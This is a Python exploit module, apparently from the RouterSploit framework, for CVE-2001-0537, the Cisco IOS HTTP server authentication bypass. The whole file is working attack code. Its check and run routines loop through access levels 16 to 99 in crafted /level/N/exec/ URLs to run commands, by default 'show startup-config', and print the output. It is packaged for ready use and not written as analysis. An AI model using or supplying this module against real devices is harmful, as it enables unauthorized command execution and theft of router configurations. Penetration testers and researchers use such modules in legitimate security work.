from routersploit import (
    exploits,
    print_success,
    print_error,
    print_info,
    http_request,
    validators,
)


class Exploit(exploits.Exploit):
    """
    This exploit targets a vulnerability in the Cisco IOS HTTP Server.
    By sending a GET request for the url  "http://ip_address/level/{num}/exec/..",
    it is possible to bypass authentication and execute any command.
    Example: http://10.0.0.1/level/99/exec/show/startup/config
    """
    __info__ = {
        'name': 'Cisco IOS HTTP Unauthorized Administrative Access',
        'description': 'HTTP server for Cisco IOS 11.3 to 12.2 allows attackers '
                       'to bypass authentication and execute arbitrary commands, '
                       'when local authorization is being used, by specifying a high access level in the URL.',
        'authors': [
            'Author', 'Renos Stoikos rstoikos[at]gmail.com'  # routesploit module
        ],
        'references': [
            'http://www.cvedetails.com/cve/cve-2001-0537',
        ],
        'devices': [
            ' IOS 11.3 -> 12.2 are reportedly vulnerable.',
        ],
    }

    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)  # target address
    port = exploits.Option(80, 'Target port')  # default port
    show_command = exploits.Option('show startup-config', 'Command to be executed e.g show startup-config')

    def check(self):
        for num in range(16, 100):
            url = "{}:{}/level/{}/exec/-/{}".format(self.target, self.port, num, self.show_command)
            response = http_request(method="GET", url=url)
            if response.status_code == 200:
                return True  # target is vulnerable
            elif response is None:
                return False  # target is not vulnerable
        return False  # target is not vulnerable

    def run(self):
        for num in range(16, 100):
            url = "{}:{}/level/{}/exec/-/{}".format(self.target, self.port, num, self.show_command)
            response = http_request(method="GET", url=url)
            if response is None:
                return False  # target is not vulnerable
            elif response.status_code == 200:
                print_success("Exploit success! - executing command")
                print_info(response.text)
                break
            else:
                print_error("Exploit failed - could not execute command for level", num)
